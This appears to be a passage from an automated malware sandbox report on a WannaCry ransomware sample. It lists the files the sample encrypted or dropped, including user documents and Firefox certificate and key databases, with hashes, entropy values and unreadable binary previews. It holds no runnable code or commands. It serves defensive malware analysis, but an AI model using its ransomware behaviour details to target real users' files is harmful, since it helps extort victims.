                                                  Preview:WANACRY!....U....`P..k..V.%.H........w.`a..@brM....`...c..._.."7B.....L..1f(.#..I7..%.-..*h.;.6...h.....8G....~...kv.....T|....;.e.{9..{9.U..M.u..?......m.U...x|{._f.V.`r...q8rm.../.$...>.k:w......Q.T.6.D..E.Z......(.Z..K.Y.:4..~H..!.dK...<e...s...L....rm.............C.!.i...`....+.G.S.2w0K.(l5gv...m.'6....Z...u..q....y._..%.z..6r.m..,e|.bI..p&.Q.l.|.5.Y...l]~X....SRo/..E...h.6.P......Q.4?..0.Nj.l .H..Q.e.-S..u.....x......G#.y..^.kp)p_....1F..JF....wtt......}.... iJV.....1.hW...9qreM.......;.HM"k}..2u..h.g..R...+....W.i.$0..&.....M.h.M@;i...L.8..2.gV...VV..0.(..['...V.}.o..(C..;..|j...c..$.....D$.>..6n&.......^~.+..>...}G.........mb......Tq........C&r_...>..<..4n.....F...@...[.P........*^.v...5.f.+O'...h.;.qT$..R.w....QU.'...L.xX.#.@...'L`..TJ.\.I.:O...e$K9>..],.]........P.....$..T..{....T.u.Q{l..t.%A..\..K..B.%....N.3..w.T5Ev..*.....kD..O<...a..[...R..Q.....M@/...n........).`..y. O.MGf..?".r..vJ]\.....Fm..9....cU3.^..>s.....l!7..F..T

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WHZAGPPPLA.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861940426202923
                                                  Encrypted:false
                                                  SSDEEP:24:bkq86g56zB0Y2HHWe/u27jf0VbT6rCfTgukHud382dYgcQvuOHvqIV/DJ:bk5v56zB0tHWetHf0VbwCrmktigbhDJ
                                                  MD5:33E1AA8C4291ECA6E89A23A05134B71E
                                                  SHA1:B0DBC8F8B2B41B982DB91F65450FC7E0E8292BAA
                                                  SHA-256:1E7DC0F44281984A6F827DE006F4BCC666F62B6FE0AF0AEECD146D78DE0B6B33
                                                  SHA-512:A583707D59908B8D9190F502AD908241400769F6D807D870B85DCBB864B2892D0C493C5F8022A3389EBB053BA22ACED9826B937E3648F3F280EF63CE4C633202
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......Tt..eM{.B.....y`sDU.L.r.+...%....[..iu^. .b....!K"V.vG.....b..j9.,.E......J|.C9.l.u.1!...I....@..z.l.....5.....B.A..".H.&|"...M|..Zv....6[......t...12g:.>....f....~J...9.....W...j.S,%..q.....}............?..M.5-...~...7.@.bI....q../..>.............I.9...jC..#.Vg9al=.......J.k.D^.C7...&.N\D...w.b."f......dW.....`.......,J..............h. .g.#T....;6|.B....@...1?.#..[..zRn.:......:3......-q.7.j..*...C.X.}._z......9r._..h.?......./.q..[.U.P..!9..}..f../...F.,..}....pAm[]>..2...)..Ou...P...G...G.rl..3....k..b_.....W[ M=........u.....`.....o.)'..A8.s........74...j.....r<-FS.]f.#.. ..$_...k8...C...l...wb .h......O9x.......f+}......aT$..Su.b....,...|..2.u..J......x....L..3.......1}.C.o..>.[G.<..}V.....k.l.DX....0............H?s.R..(\....<3.~.b.@......S.yt...>./.)..?..z9....y...T..`%....qLk.).1y..!..D....".l....G...R..X.O*.Sv.+.C.@k...g...`3...]7_.#...!L.d.;.....n..5.....w...?..4....b,..X.........q..w.L....0.6j..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WHZAGPPPLA.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.857915123985954
                                                  Encrypted:false
                                                  SSDEEP:24:bk0JLdTA6pSYQGJZBq/h7211iIc6j/fXRpEWP+GcYQ8QAGLK:bkcLi6QYtVqZSrfXRpGGcYbIO
                                                  MD5:581ABFAC5CA2CC0DA658625701B59AA0
                                                  SHA1:AD1246C831AE20976F1BB3E5FF794B5C5A31D94E
                                                  SHA-256:55CD03B1A4131DD022774DCEF1450F32DAE1AA0E9E6E24330DD1D24DB2F11515
                                                  SHA-512:F05A551E297ADE8012D3E5916FE308D7C986E8ED259B7720BE947651AA7F1A3819DA1FB72523E815EDAAF2E804B482836AAF4FC55E655038E4185C852074C33D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....?..Q...........d2...q\...C.+.b1k.....W..-...u|...\..^.*K..(...i....F...)...7.S...;..W.....N.......2^P..ss..:|..O.....-V.n...>.J.h..(....`.P......G".....,..@b...m..m...........E>y...?.N....V...R......n...If....h %M...O.!....g..Z.D~i.A..b\'...r%..............o..:...R7.....2.g.2z?....2f;.cT...rr..,g........d..%(.4.)e....z.fg...q...P.=cf..r.[d.....f..4b..e....N.#?..\.J....\K}^....b1>.>X...1/..b]..p.j.X.A..$..m......v...wP..(.z.m.V.> <.7$`)....+...L.......#......Y.2..}.b.F2.}.. .(........ ..Jx..s...%.y.f.'..z~O.."..*.[wR.Je..{sa.t..uS;..":k.b....$.\......r......&....=.S..Q.!..9....k.k4.[.c...;...r...M..&.(y..1)R.e....3*. .,.=G....<-C6..f]..B...f...&S..+....$.#..d..B.~.z{.)....A2.9.B......i*~ak.{t.b.'?{;..*.&.<.j@.)~.9.sT.w.5....._.qL].K.:.[."".y.6od.J..Y]./=...-..+y(C7.j.U...Cc.W...M.6.-.^...8T7..k..E......C%k....P.J.}.~'..-Qv.E.....{...| ..I.cI...n.1...4........4...vlF.d.50.+]|P.............(.3uv=....Q.pq_.-F. .w.R...'5.{f./..4y.*

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WHZAGPPPLA.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85417753979318
                                                  Encrypted:false
                                                  SSDEEP:24:bk1P06vx0Hykr/WgeHuxfFykadxzkJlkgR2RbYFeTynNtTUD5GnXIsnroP/kqf0n:bk1P0e0HdWBHm1adlk3dR2hYFKOYlGXZ
                                                  MD5:9DE02CC60589F34A4B96FEFCD9909704
                                                  SHA1:66FC1CE161EB8DCC1954AD149DF3CB3471B6354E
                                                  SHA-256:FAF1DF84986305E9644CC78C56FBEEE75261D737996D1584A5272AFAC966AB44
                                                  SHA-512:79BB02E6F15325F98311655B6E9E711DCAAAD68A0B5B7ED1E263CF0EF08A820F6C33D14170B773D5947B6A4A341BF9BDDAB2CB6D9633D2851EF1B5C4F0651C2A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...... 6.....)C#Y.2o..A...t=AFU.Lf..`..............@A..@..0,DU....2.(..X{.N.C........l.P.{.+c...t...Z........Ew1,.m{b..j.............B_..^....."..../.P.F....>+.JB..}=..1.U]......O.....q....07..Y.|-.iu.n{.knqMh.......%.t4.MK.`..0.$".t_.o6..*N...?..............O..$P.q.@?...@zu.D..*W..........!.6i...T....a'.Z[....5....{.D....|.gf.O.Z.i...bW.......v.E....k9TP.C.<..Y.-..+?.....`...u~.U.T#J.5-.I....C......?...........^.}.K.\.....H.t..i..>J....._..N.}.N@...( :.Ht..`.O.P..a...?mM.R..K~.@....;.HJ....|.........i.'..o.'J.k..R[<..U.I..8&.hc.O.y6....<....t.....j?W......XJ....X..d.<...=..vEy....6$op...".......K...#.[..:.[-..M.S.t......A.x..\.6....Fx.f...r.L......./.....U.<.Zi.g.u.n,..0....o8..Q.n...:..[...,.......kz..@.........Vy!7.w[..S.h.Y.%..B...H..n....`.@5....!Vw[.QH.zT....HY.....?.I.m....=*.m%..lL.l.:.T..*,..B_1"....D.[..!X...ki.5v....oW.@.0..F...........r......PLx..\.*..K...LU.M... .....'...;..V.+.....7@..g.H.......]..9..r.Y....e

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZQIXMVQGAH.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.830720891656247
                                                  Encrypted:false
                                                  SSDEEP:24:bkK2HqT70oYVZz7LsLKWrv0lm1ZbyYYqc94zGcwcDHYiIQ76KsH4okdE3:bkK2HqTAoYVmOWrvjZWfraxp2KDoF3
                                                  MD5:30CFA429B724F2B7A17E4915AA7FE6A2
                                                  SHA1:ABE7695E0E4E7C3D66F0D98073A69296BE6D8A60
                                                  SHA-256:09461963138E6C9693507F856D1F2232FFAC66DABA8755131089C9FAC14C4A69
                                                  SHA-512:40142FEABA30525A9568F52C1228F2A3E7D3D6DBC455976114A377462600039C1D5436BF54B74710641DE9DF6EC46A3D6ED39629DC0371B1BEF3D4065EDB1800
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....J.~.]B..N.^.......g..x..........TG....l..(..4.+......#.Y..Q.z9.D.-.-...Q...6DM..].O.3...$.6..[...{D.Ef.:B..<..Lx...].D..V]]i..g..J.3e.Y......R.$..G,.UB....TY9....u.I.7>v.8UAbC&X.R.1...{>H{.Q.&.q..I...... C.n$U. E..l^bH....J....Rq.}j.|../1D.....8............V..N......u ....mbt...c....V..u...J...K..f\e....&.HP..C...D.C.,-...y.}`.E{M.ZqN.x.?. `./.8~..\qH26.[h.I...X+.>..YTr..W.M.!.>T.......bN>;.....T+o*.]....5....2.I..=J.Q.M....-.L]k..........,G..}*.....V7....1h..sa.D...6.H... .U.l._C.J7.1..E..Ps..D.......|}......WI.")V.'.:.TH...|}..B..k4.g.{.J.I"(F..]l7.K......oY#..c.$P...Pj....=...f..~+....$.m.........o.Q.F.._.].5...I0.[.c..4x...o$)c.S.ld.:gzs.{.4.1.....~....5..Prex`o..{. ....m...._Be.L........)...H...!..B...d...........5........U.'&.......?.iTy!k......x.I./1-.sm.bx....B....~v.$...iQ..:...by..........:.....!].l..C.#.`\iQ&B..,.e.Q.C4r.*HkC..'\...C.....:XV..zU..aTz.8...T.y......B.WM....(}>(^PnCt....EH.(....;.._.<|%"..2..{j.e..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZQIXMVQGAH.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851181274244945
                                                  Encrypted:false
                                                  SSDEEP:24:bkHvca231YjsDIvaSFS/5WbXpke8O6Pts5bAYBzfmanpoeNhE2q3LE:bkPl02aSU/5yXue8O6PaAYBLmanTNy2F
                                                  MD5:5F3FAE3B5BF3DCFA708D912ABF8A65F6
                                                  SHA1:CC459E124F2DFD4583D9E705BFD3030459A82FB1
                                                  SHA-256:BC1B3544DE3234DE2A3D6E31BEBCA05E526161E42859F4B0CA6E63F6FAA970A9
                                                  SHA-512:516792BD1350494392AD9850DD448DC9439C8007BB345B09A7E2CB20832D35A4DD6128A66FCB324F93D8212439128C48A5AAF4AB00078938022B6160B06DAEC6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....;...`.[...aA..gNf..r.l.Ik.q.....:....=.A.J....f....,.\Dj/..&7j..c....i......S.dR..[hw.&.........(.+.'.... )[.i.@...^U......J.$ZCr:9..Fo.,.......-5.W..1Z....7.....L..Px..q(.l#.......`M....o..?.;...A...J.Vc.YW,.&.....k.I5Y..(K...9.(.|..!'v.g{............r...k.]..W..H.k..<..9_.I..7...5t....s.R.....sz..'C6GD....H...Y..1.1+|%. ..+.......Eh."..R......fZ/.25f.~c...d..).I.f /.....e.F.{y..]F......K..b..yv.....k!....}.....T..`....r_Z.. ....-s. ..N.}....g......_.#z .h7.w....t;.......M...n@5IoN.U.<......K..9.l.\.p.}E....t.~m..G..,?....I..,..<..).>tG#?...v.;..V.96.0.n.N_.i....2.....2...K..d8...m.%.....U.>...2...r......Ea....X..!.sJM.k?.n$.}-~...Gdgd..C...R..:. .x..c......i..u..w{4..K$H....%......T..~.Q..@1.....L..p..T..+U.O...M.....t.....d....h....+........u.........n5....Kl'`FCJ.....{...I.yo.5.....N.5).. ....h.SnCf...\.....nR....[...z9..0........l.a..p...J..:....K..@.7!..*2sC.R..>...,.j..Qi..L.'m......\....".X..z..Xm..x4.y..I..=....*^

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):40984
                                                  Entropy (8bit):7.995961555041992
                                                  Encrypted:true
                                                  SSDEEP:768:R2DHMq1UyyLSuyyYTaN4xAG2SzUh3Dk1iVT2cNI3jZ751SrvKsG+UpOa:Ry+ynuCLAG7zgDkwVq6Il5mKGU8a
                                                  MD5:1ED97896B32C5C409416B7202CFD7F5D
                                                  SHA1:B4F142469B7CD386E93A478C6A69BE72E4D4C660
                                                  SHA-256:90BD07713B1A2F137C6F4FCAE1BEA441272F547E8F02D8541C020A7F7431866E
                                                  SHA-512:99ACA26B05649D41C6D9E55C3F97241D172F700639CCF4B3D52A252D9673061217489F05945FE31FD846D0586A5141370967DA9EA7AF2E7BF57441FF1D7F8767
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....e...m1.. 3W%.g..w..P..yZ.....o...Z..[........Oy.aD7.I.I.^..s... ..GIHv../.7..Y.....N...!..:v...Y.......XOl-.D.X0u.c.!..i.......D.G..n..o.%.3.2....* L?=gD?..W-%.t+i[EG...-.."..e........L8.......Z.Z,h.t4$...<Jr.C...f^.0@.p^.B..-aD.M-..s.....]Al............Z.@.J]x...5..s}p*uH..........Z........HnPY.........}Z..o..q...%\&....I1...F..y.,0..?...?x.B..?*...|+.V..0\,..X...C....&)..4..G.U..9s..eZ...B..w.:X ....m....'.b....0.+p.b.5..9...&...V.w._..._...y=.,........P..6h.]...?.B+Cb4f....C.+"`.(...[....m............._|.}I3#...5|...g...........[..%SXxE..zd....F..s$.9MgJ...Y..~. C..`.W.s.=.T.a..k..t..zJ5L-..u.1..j..].._;3.Z......N........_.........#..|...+ ....v.ol.....p..m.....=.gg.......V.Uv...........f.....;.c.4,.EC....{~.....&.:.<k.."E.zE....0x....J..Eai.....Z/".H......;6.;.Lo....{..U.}..-G.........f-..Y..n...........V......m.O....=q.`.`Az....IM..h{D.{.[r.<.._.B/r.3....A]6!A.z......;......?%.e|3$....k_.6'.....mO.m.P../n.}..$OKo8

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):125288
                                                  Entropy (8bit):7.998501210566462
                                                  Encrypted:true
                                                  SSDEEP:3072:gxvn3hCJfILYLKPip9Jcth/l6vBJ9S66svgUnkF/f487+h:gxv3QfS2K6p98AH9SR63klv+h
                                                  MD5:3A22A7250F745E7029FC4557729D2673
                                                  SHA1:8DC231AD5463B486D7D807F194A578156C42F08D
                                                  SHA-256:985E8BBB3A798817B2065AA07F41CCADC642A51F59D85E2CFB98CA98BB380B83
                                                  SHA-512:ED8C5FB6D3B42727BE19711D37FF5D9781C051B4B7E53C0287E6BCFEBD3FD4BDEB01266F07F555B42F9215BFB5024FEE74A1DDF9F0F0E3B78F1418A9C33DEF41
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......'.,..1C....t..$.E. ...Mo....}@.=...\..6..qE....._.....[.g}@@$}.F..%-?....$.D8...M4.u......={I.k..)...ZY-......#.+n.^.Y.c.........F. }..i..)W..sd..'.C.oM...u..*..K....*[.k.gm....F..6...G.V.p..w......#F.!...y.3..a0.>O..S.!...X.?...Xe...}....D..........9....z.$.MF. .|.....Q|:...Gc..g..5...0]<...q...y.tm..C..a[.....Bw....R......8................R....R.q..i......_.2.....=.2....9....%6.5..,@..5f..>d.%]j"...1..c...2.....C..m...4.t..f/.P..t.*..........C&a.@.L......H`../.e.W.8.V..q;{r..j.....V......U.&..o....y.../fG...v2.)AZ. ......t .7. .cp..>-.).e;..W.q!...v..b92C.]"dF....^^...o.b../......8.4...=]@.$..&@gZfF.....i....q..v"j.&b....){....#'.s.w.+.Q<..R.{E.)l....N..*R..%....v......8.>......g.`.Uc@h...P.{T;.2..r....2c7`..h-.... (@3..1..H.$..K..y..sM/B3CV..r..x...+.L....I......!. ...2.8[........C..%......:[.Y.....s..m.$uT.<F.#..A.7^..P.....(.7.>y.*....Z.....o.|.[.I..5y..8.....m.L.@....o.[..Q.....$...i.b9..7Q&.*h.:.y!..).Vh

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):125288
                                                  Entropy (8bit):7.998501210566462
                                                  Encrypted:true
                                                  SSDEEP:3072:gxvn3hCJfILYLKPip9Jcth/l6vBJ9S66svgUnkF/f487+h:gxv3QfS2K6p98AH9SR63klv+h
                                                  MD5:3A22A7250F745E7029FC4557729D2673
                                                  SHA1:8DC231AD5463B486D7D807F194A578156C42F08D
                                                  SHA-256:985E8BBB3A798817B2065AA07F41CCADC642A51F59D85E2CFB98CA98BB380B83
                                                  SHA-512:ED8C5FB6D3B42727BE19711D37FF5D9781C051B4B7E53C0287E6BCFEBD3FD4BDEB01266F07F555B42F9215BFB5024FEE74A1DDF9F0F0E3B78F1418A9C33DEF41
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......'.,..1C....t..$.E. ...Mo....}@.=...\..6..qE....._.....[.g}@@$}.F..%-?....$.D8...M4.u......={I.k..)...ZY-......#.+n.^.Y.c.........F. }..i..)W..sd..'.C.oM...u..*..K....*[.k.gm....F..6...G.V.p..w......#F.!...y.3..a0.>O..S.!...X.?...Xe...}....D..........9....z.$.MF. .|.....Q|:...Gc..g..5...0]<...q...y.tm..C..a[.....Bw....R......8................R....R.q..i......_.2.....=.2....9....%6.5..,@..5f..>d.%]j"...1..c...2.....C..m...4.t..f/.P..t.*..........C&a.@.L......H`../.e.W.8.V..q;{r..j.....V......U.&..o....y.../fG...v2.)AZ. ......t .7. .cp..>-.).e;..W.q!...v..b92C.]"dF....^^...o.b../......8.4...=]@.$..&@gZfF.....i....q..v"j.&b....){....#'.s.w.+.Q<..R.{E.)l....N..*R..%....v......8.>......g.`.Uc@h...P.{T;.2..r....2c7`..h-.... (@3..1..H.$..K..y..sM/B3CV..r..x...+.L....I......!. ...2.8[........C..%......:[.Y.....s..m.$uT.<F.#..A.7^..P.....(.7.>y.*....Z.....o.|.[.I..5y..8.....m.L.@....o.[..Q.....$...i.b9..7Q&.*h.:.y!..).Vh

                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\AlternateServices.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):888
                                                  Entropy (8bit):7.736028617106661
                                                  Encrypted:false
                                                  SSDEEP:24:bkuSUxYGPe9vcrtsFCUSAeh9aIecZdw9o/s+rLQt6ybvfh:bkuxxYH94asUFTnYEok+rm6K3h
                                                  MD5:02D1E37B1D4ACF29A9A3988C6B807795
                                                  SHA1:FAC2478B656A65C4ADF2D0AF2475937B1B5CF240
                                                  SHA-256:80E6FB1CAEB7BC77C5367EF2BDACF350E6A45AAFD0ECC7356EC528DC64DF3A0F
                                                  SHA-512:FD2D38710F8898A04D4967B721500D9FABBD700D3F497ABB9472BD78A04B1191CCE9F98C95191298A58FC368D9B336EDA412DFBCE0E35A803D588658320DFECC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......2s.b......(z...d.e=......aa.c.....&|{..pD\PR.D.:.'Z.f.........IB....]...Z.@H.....G.....f7....)..+...([...6SM3E...|..........(.a$N......@V.T..'5_..V4.p..I...L.Ej...QGB..:.<b6..R?...q."u\..4\..+....x.*3...vf(n.5....H.....#.#....TGk.^.v.D..P......X.........\.!.1....=...K..g'..fV.cW../|..i.['...F...o.W..F.....I..!E.?U.H.......;g.I....5tE....8vH.Y..s.wa.Q.l..p.S...F... `...v..0y..(.e...-.h.9n.K.G...8....J.D[.)EX..3..n.!..6(Wm...c_......1..p.=^....[..?..A....<.F.R&P...q..C...Bs3n..I|.c,.].u...p.6..{H?.........I{.tF.W1l..j..!.*)..Ca%.*.W...\.n.]....8..._8.7.f...y..I..A6.V.z..s....@Cn....B[....94x..0.....z.5i...h. )H..R......c.6_.E...........jpU..|.....e..G....z..J.mC.......T>.5`A.....'.P....;.t.?.=$....u.m.%....6?a ..q'U.........Ms...as.m....X.M..D.B..VR..@.Bw....ft.K.......%D... .`.../.v.^.+...wP......8D....G.....}.u.xuTm.....4.

                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\SiteSecurityServiceState.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):888
                                                  Entropy (8bit):7.722119169283915
                                                  Encrypted:false
                                                  SSDEEP:24:bkfXT1ony6pfGC/GtrfsmxCE+w1cZNGliOM:bkfXT1onhpyLDpvqNGlK
                                                  MD5:9C0A60FC529A21C2CA883FE7AC4A3F19
                                                  SHA1:CB9CF531D3750CDC9E75987210ED58F703506765
                                                  SHA-256:EE20CD659D6968A1F0A2287B0E9E24EC0E07D75C4434318D8724B67C7E0DF310
                                                  SHA-512:EDD13B81C8849C50DBF685E72518DAA6EB7C7105065D3DBD32F9A75BDA336F26B3C02AACC077B3BF0AD9983D8C33A28D4F88B3E08CD3D2D8B94E766890F810E3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......Gi....v..+.N..G...~D|....f{.....1.y.Ak..Bp|.:...g.....#..B.^?N.h..l.f...C..qy.*Wl..0..Z....q.h[(zky..9.....k=32....,..i.E.I....`.}CIF.c.|.n.._.....'....Y.i.........R.....%.U7....._..T.....h...uN.41..e.*.bVI.....4..Ow.e5.r.O.^13V..K.[.....W...........i..Q9....j.C.).....[1.. ...BK+.DF!...v..F....|.9...'0.)..w..u.f......Y..5..v......ye...&|....j.. ...K...[Y.s4....a.H8=&.w.*._i.N..Ip...........i..QE..|.|.k.}.L-Y.W8g&...p.''....b+..Q..15....*...&].o...|^......).........'B....3..8.g..|b.........+`...8.........QJ.B...b....}...t./....8@..n...T.@.p...w...@m..<......}P.eq..3'....c.KyoF&P/....lQ'.l[aU}. .a..w..$..B.5k...G.............&!T.P...Hy........z[.j......I0A...)....V...6..>G......t..o..CZ.GW.......-T.:.n..,[...C........Zu.'..C.g..0..l.[...6...Or..S`O.......u.0.#..m..c...%!..c)M..~3....r.PlC....Q..JA.r...}..;...3Ef....'$..

                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):229656
                                                  Entropy (8bit):7.999216621550258
                                                  Encrypted:true
                                                  SSDEEP:3072:w8g8RS41otwOz0ApvQ2XkzxzAlKtfsPV7cJZ/CMkkdug71t/Is8KSHC25vpW:w2oqMTQEiNreVIJJdfwPXHCyhW
                                                  MD5:DAF34BAA727968B2DF0063B4014501DC
                                                  SHA1:972AC17BD5F29C2EFE7122AFFA1270A2C17E0610
                                                  SHA-256:1EACE0BC6F50E4920EAF2CFC6E90768C819260111E5C8373E0188688DE198499
                                                  SHA-512:F59158E0898D3618B99C8304610FC79F9515E3B9C82F41FAF9418E7CAD88A1CA63FBCB208BC884FA2DEAFBA284F0B61827DFD033BA6B0180AB55F2AAEB08A0D0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....r.....B....J..rXl..1......p...e.Q.;.:.....6..U....|...:........&.._...c_p..'...h....D:.8....h.}.w(...../|q.z.i.......OH......Kyb...\a....H9....Z@.....WLL7D...im...5B.1...D._.V.F.I.....jT.$...+.n\&...kPk...F.p.+.@-........({.L2....P.,..m...............`...n..n..Z...|..f<Q=l.$.RG....+.6i......uQ.}...T.3.q.=....<#?Q...)..S^.4"A...2.3...Y..q..O........y.U......'...uWT.I+G.z.\|..|...?=...qR.Jv.-..7....A..O..4...>^............)k.N...c...FH...Q]:..~...'.,........%....%5_.., FW.N..w.s.a.SU...l4.............E.......%...p......<..<......).Q....?...C(.....(.~=......BV.,]n....l.>.7.!5..Jh.bI.!...NG?.@-{.a..W..m..O..D+.......{j.q,R.?.W.kr..q...%G.........,C........8...L_.q.x..h..?C"Q.8.*.l..&.-.0N...&.qCw,..,..{>..U&.)>........+..`..u...Y.q......Q...T...>.X.#..?.5....46+..$.3.1kb...]4.K......s.4..YI.A[..9G....'..L](ZAZ.1.H..U<...t.....YjJ.[.h..*ef.1..my.t.9...-.&b-v......Y..G3..)8Z..[.....!.g...'..q0.!g.....N...Yv.B.a..a.z...M..x..

                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\gmp-widevinecdm\4.10.2209.1\LICENSE.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):760
                                                  Entropy (8bit):7.730406935914848
                                                  Encrypted:false
                                                  SSDEEP:12:bkEULfnVdVPUUc8FFBFeGQ0qiSwbUjMIpjAaeFsVmASDICkmWeZFwPU3f1SKMwv3:bklLfzlq8Fgb1wbUj3pjAKVvCkmWeZGk
                                                  MD5:B42CBA6F412BF74D64620F3703764B89
                                                  SHA1:D66493D98A5F38D6301E825591B0ECF0A5A090E5
                                                  SHA-256:D3D544797AA027248DF7ACC14FD2C97E35AEA645AC479045EBBD1977B58313FC
                                                  SHA-512:56CD36F4C618F6E32AA84EECFC3B8BE1DA3CD2621239F9C6D71BA993FD7CD36952C9853BBEB4A5F0D04223B038638EA21606F3F54458AE7245B0BA572C392FD8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....'...J\.P..Fe..@....o..B:. *A.u...G..-.O...S..w.f.0,%..)1Ai.<..M2.P..K.HOd..Y.,...zsl.<.:g.f`\Yr...pGq{V$.s.*....j.-.^...d.....J...........Z.^.=...MNP.r(...~$....0....u..........S.$.....O...........\..8K...P.*.........+L..x..n0[c..v#...37L...f.............Y...h.[....9.w.l..C1....../.UH.8~...;.&...S[.FJ...uWp....Y(...6{..A/....x.2.7......g.8..i..........V|..t.x..s&.SI........y'/.O.qr...._#sM....%.c...O..UiV..9.GD.I.....6B..I..1N''....R.>6....-N.M.....~.d...W....'*.,.=.S0.<.5...........@..e1... ... -.n#s.....8.RQ..F.x.I5R....G*t.....|.3.....C}s.y..v!m.O!`h.B<4zS."h...s`.H.........l.p...9.F.8.m.&P.@...r.^.m.Y0....*rg...!....'G_$>r;s.{q.Z........)..../ZNz(......Pn.Lq.l..cc.7A.....z..t.?o..b..'..02E...-

                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):295192
                                                  Entropy (8bit):7.999422556039973
                                                  Encrypted:true
                                                  SSDEEP:6144:9Ldm/3hcskdIYLZdHqDYqEcKSSwmbG/XGH1mlfsGgag/:9LI3yskdIYLZI0lwqbG/2Vmlty
                                                  MD5:0949CB15CE9A8A227A31E7D293B83F22
                                                  SHA1:AE2D9F0423B460E8956065A363B8EB21C1F024AD
                                                  SHA-256:3FB76001672D8ADED99421D7E37BCD0B1EE1D242F1E8EF9D261A66FF4499A369
                                                  SHA-512:8B2ED7AA98B7BCDDA34EB8E439566899649BBEC9DA1CF07496F00688EF96769CAFDBDF2AE579400DECDBDB82B224B12EA8DE2E9995A932951E65C0CDEF37D74E
                                                  Malicious:true
                                                  Reputation:unknown
